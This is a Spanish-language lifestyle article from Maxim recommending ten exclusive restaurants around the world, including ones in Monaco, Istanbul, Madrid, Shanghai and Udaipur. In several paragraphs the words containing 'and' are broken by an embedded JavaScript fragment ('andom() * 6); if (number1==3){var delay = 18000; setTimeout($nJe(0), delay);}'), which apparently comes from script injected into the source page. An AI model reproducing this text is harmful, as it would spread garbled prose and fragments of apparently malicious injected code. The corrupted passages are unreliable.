10 lugares en los que debes cenar antes de morir

    10 lugares en los que debes cenar antes de morir

    Reserva en uno de estos magníficos restaurantes internacionales lo antes posible.

    Autor: Redacción Maxim 25 septiembre, 2019



    Cortesía

     

    Los restaurantes más exclusivos del mundo

     

    Si eres fan de las experiencias culinarias que cambian la vida, considera reservar en uno de estos 10 restaurantes dignos de una lista de deseos en todo el mundo.

     

    Seleccionados de la lista Lannoo Publishers de los ‘150 restaurantes de que debes visitar antes de morir’, hecha por la bloguera Amélie Vincent, también conocida como «The Foodalist», cada restaurante de alta gama se presenta con una reseña que ofrece una breve descripción de los chefs talentosos, el tipo de cocina y por qué debes hacer una reservación lo antes posible.

     

     

    LE LOUIS XV-ALAIN DUCASSE

    MÓNACO

     

    Le Louis XV-Alain Ducasse, es uno de los únicos restaurantes de alta cocina en Mónaco que ha ganado tres estrellas Michelin. Se encuentra en la planta baja del Hotel de Paris. Un extraordinario candom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andelabro de cristal de Murano compuesto por 700 piezas hechas a mano sirve como pieza central del interior, iluminado en oro y dandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando paso a una terraza magníficamente ajardinada con vistas al puerto de yates y al palacio real.

     

     

     

     

    MIKLA

    ESTAMBUL, TURQUÍA

     

    Mikla tiene una de las mejores vistas de Estambul, ubicada en la terraza de la azotea del piso dieciocho del hotel Marmara Pera. El restaurante en sí es sofisticado, con un estilo minimalista y elegante, adornos retro e iluminación acogedora. Saborearás la versión del chef de Balik Ekmek del sándwich tradicional de pescado, frente a vistas imperdibles de 360 grados de Estambul con el estrecho del Bósforo reflejado con las luces de la ciudad.

     

     

     

    ENIGMA

    BARCELONA, ESPAÑA

     

    Enigma es un restaurante de todo menos convencional, ubicado en un majestuoso espacio que combina el minimalismo japonés con la ciencia ficción vintage. Una vez que se confirma una reservación, los comensales reciben un código para ingresar al restaurante, donde descubrirán los 40 platos del menú de degustación que combina influencias de todo el mundo, incluidos Japón, España, Corea y Brasil. Se anima a los comensales a moverse a través de los siete espacios gastronómicos distintos, cada uno con su propio tema.

     

     

     

    DIVERXO

    NH EUROBUILDING, MADRID, ESPAÑA

     

    Con solo 30 asientos en el comedor, DiverXO es uno de los restaurantes más famosos y exclusivos de Madrid. Los clientes hacen reservaciones con hasta 30 días de anticipación para probar la sorprendente cocina de fusión hispano-asiática del chef David Muñoz. Perfeccionó sus técnicas de cocina de inspiración asiática mientras trabajaba en Nobu y Hakkasan en Londres, razón por la cual los abundantes ingredientes ibéricos se combinan con los sabores de China y Japón. Como una actuación real ambientada en un extravagante comedor (las paredes están decoradas con cerdos alados), los camareros sirven las creaciones culinarias en platos lisos de cerámica blanca, como si estuvieran poniendo pintura en un lienzo.

     

     

     

    NAMA EN AMANPULO

    ISLA PAMALICAN, FILIPINAS

     

    Nama en Amanpulo se encuentra a pocos pasos de la playa y celebra las influencias japonesas con platos auténticos, sencillos y elegantes. En la remota isla de Pamalican, rodeada de arrecifes, en Filipinas, Amanpulo ofrece un impresionante refugio de lujo con playas blancas como la nieve y mares cristalinos. Amanpulo tiene su propio jardín orgánico que suministra muchos de los ingredientes del restaurante, mientras que los pescadores locales proporcionan mariscos frescos o que provienen de Japón. En el menú, sushi, nigiri sushi y sashimi están disponibles junto con platos exclusivos como Kobe gyu: un filete de Kobe Wagyu japonés a la parrilla servido con sal mineral Moshio con infusión de algas marinas de 2,500 años de antigüedad.

     

     

     

    ULTRAVIOLET BY PAUL PAIRET

    WAITAN, DISTRITO DE HUANGPU, SHANGHAI, CHINA

     

    Ultraviolet es considerado por muchos como la experiencia de restaurante más vanguardista del mundo. Ubicado en un búnker anónimo en las afueras del centro de Shanghái, puedes experimentar el excelente menú del chef Paul Pairet con video, audio, iluminación a medida y aromas precisamente coreografiados para cada plato. Los comensales son conducidos a la ubicación secreta, que está en un callejón oscuro en un espacio de almacén industrial. El comedor con poca luz está amueblado con cinco sillas colocadas a ambos lados de una mesa de comedor común, sin ventanas. Dentro de esta configuración futurista, solo diez invitados por noche se embarcan en la experiencia culinaria de 20 platos.

     

     

     

    MICHEL & SÉBASTIEN BRAS TOYA JAPON

    HOKKAIDO, JAPÓN

     

    Michel & Sébastien Bras Toya Japon, ofrece una de las vistas más impresionantes del lago Toya. Encantado por el paisaje natural del lago Toya y sus alrededores en Hokkaido, el chef Michel Bras y su hijo Sébastien decidieron que sería el lugar perfecto para establecer su cocina con una vista impresionante de la región. Visitaron a los agricultores locales para desarrollar lo mejor del terroir en los colores brillantes, aromas, sabores, movimientos fluidos y elegancia sensorial de la famosa especialidad «gargouillou», el plato de verduras característico del chef.

     

     

     

    BENNELONG

    SYDNEY, AUSTRALIA

     

    Ubicado dentro de la famosa Ópera de Sídney, Bennelong es un elegante restaurante que se ha convertido en un hito por sí solo. El restaurante de varios pisos permite a los visitantes tentar sus paletas donde les plazca: cócteles en la barra superior, excelentes platos de la planta baja y ostras y champán en la barra del bar Cured andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and Cultured. Según 150 restaurantes, nadie debería irse sin pedir el obsequio exclusivo, un «postre a base de merengue, homenaje a la increíble arquitectura de Bennelong».

     

     

     

    SONEVA KIRI

    KOH KOOD, TAILANDIA

     

    Soneva Kiri ofrece una cena a la luz de las velas en una vaina de bambú privada que cuelga a 16 pies del suelo. Situado en Koh Kood, la cuarta isla más grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande de la costa de Tailandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andia, Soneva Kiri es un complejo ecológico remoto con villas privadas de lujo. Los huéspedes vienen a bucear entre los arrecifes, explorar la selva tropical u observar las estrellas en el observatorio de la propiedad.

     

    En este entorno paradisíaco, la experiencia de la casa del árbol se lleva al siguiente nivel: los comensales pueden comer en un árbol de eucalipto a 16 pies sobre la selva tropical, sentados cómodamente en una vaina de acero y ratán, con vistas al Golfo de Tailandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andia, mientras un «camarero volador» viaja a través de un cable para servirles. El chef Khun Benz prepara auténticas comidas tailandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andesas basadas en las pescas más frescas del día y los productos disponibles en los mercados locales o en el jardín orgánico del complejo.

     

     

     

    BHAIRO

    TAJ LAKE PALACE, UDAIPUR, RAJASTHAN, INDIA

     

    Bhairo es un restaurante ubicado en el Taj Lake Palace y es uno de los lugares más fascinantes de la India. Enmarcado por el telón de fondo de las impresionantes colinas de Aravalli, el lujoso Palacio del Lago Taj fue construido en 1746 por Maharana Jagat Singh II, el 62º sucesor de la dinastía real de Mewar. El exclusivo y opulento entorno de mármol solo es accesible en barco, y abarca cuatro acres de elegantes patios, pabellones y jardines con una refrescante piscina junto al lago. En Bhairo, la vista y el ambiente a la luz de la luna son sorprendentemente únicos. Mesas vestidas de lino con sillones de mimbre abrazan el borde de la terraza. A medida que los pájaros vuelan lentamente y la costa comienza a brillar con luces, la atmósfera de este restaurante contemporáneo europeo-asiático, lo convierte en una cita inolvidable.

     

     

    Mientras encuentras la manera de vivir estas experiencias, puedes ir conociendo LOS MEJORES CÓCTELES EN LOS BARES MÁS EXLUSIVOS DE LA CDMX.

     

     

     

     

    Temas relacionados con esta nota: , ,

Reserva en uno de estos magníficos restaurantes internacionales lo antes posible.